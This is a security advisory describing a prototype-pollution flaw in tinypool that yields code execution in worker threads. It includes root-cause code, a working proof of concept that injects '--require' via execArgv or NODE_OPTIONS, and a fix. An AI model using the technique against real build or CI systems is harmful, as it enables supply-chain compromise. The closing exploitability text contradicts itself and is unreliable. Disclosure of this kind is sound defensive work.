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GHSA-5gmw-xhrv-c9v3
tinypool passes worker options to new Worker() by reading them off a plain object whose prototype is Object.prototype. Options the application did not set are resolved through the prototype chain and then passed explicitly to worker_threads.Worker.
Node core ignores Worker options inherited from Object.prototype. By reading them and passing them explicitly, tinypool re-materialises them as own properties and defeats that protection.
Two keys reach code execution:
execArgv— pollutingObject.prototype.execArgv = ['--require', '/path/to/attacker.js']causes every pool worker to load the attacker's script.env— pollutingObject.prototype.env = { NODE_OPTIONS: '--require /path/to/attacker.js' }achieves the same via environment injection.
Root cause
dist/index.js lines 508-511:
env: this.options.env,
argv: this.options.argv,
execArgv: this.options.execArgv,
resourceLimits: this.options.resourceLimits,
this.options is built at line 470 via object spread:
this.options = { ...kDefaultOptions, ...options, filename, maxQueue: 0 };
Impact
Arbitrary code execution inside every worker the pool spawns, with the privileges of the host process. Because tinypool is the worker pool behind Vitest (~42M downloads/week), the natural blast radius is developer machines and CI runners — an attacker who lands a prototype-pollution primitive anywhere in the dependency tree gets code execution in the build/test pipeline, which is a supply-chain foothold (access to CI secrets, signing keys, artifact publishing).
Proof of concept
Minimal reproduction (3 files):
worker.mjs — the application's own legitimate worker:
export default function double(n) { return n * 2 }
payload.js — attacker-controlled code (never referenced by the app):
const fs = require('fs')
fs.writeFileSync('/tmp/RCE_PROOF.txt', 'code execution achieved, pid=' + process.pid)
console.log('*** RCE ***')
app.js — normal tinypool usage:
const path = require('path')
// Simulates an upstream PP source (lodash/qs/minimist/set-value/deepmerge)
Object.prototype.execArgv = ['--require', path.join(__dirname, 'payload.js')]
const { Tinypool } = require('tinypool')
const pool = new Tinypool({
filename: path.join(__dirname, 'worker.mjs'),
minThreads: 1, maxThreads: 1
})
pool.run(21).then(r => {
console.log('pool returned:', r) // 42 — app works normally
pool.destroy()
})
Run:
npm i tinypool@2.1.0
node app.js
cat /tmp/RCE_PROOF.txt # attacker's code ran
Both execArgv and env vectors confirmed on Node 20.
Suggested fix
Resolve worker options with own-property semantics:
this.options = Object.assign(Object.create(null),
kDefaultOptions, options, { filename, maxQueue: 0 });
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The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability.
Exploitation activity has been observed. Apply available patches or mitigations urgently.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
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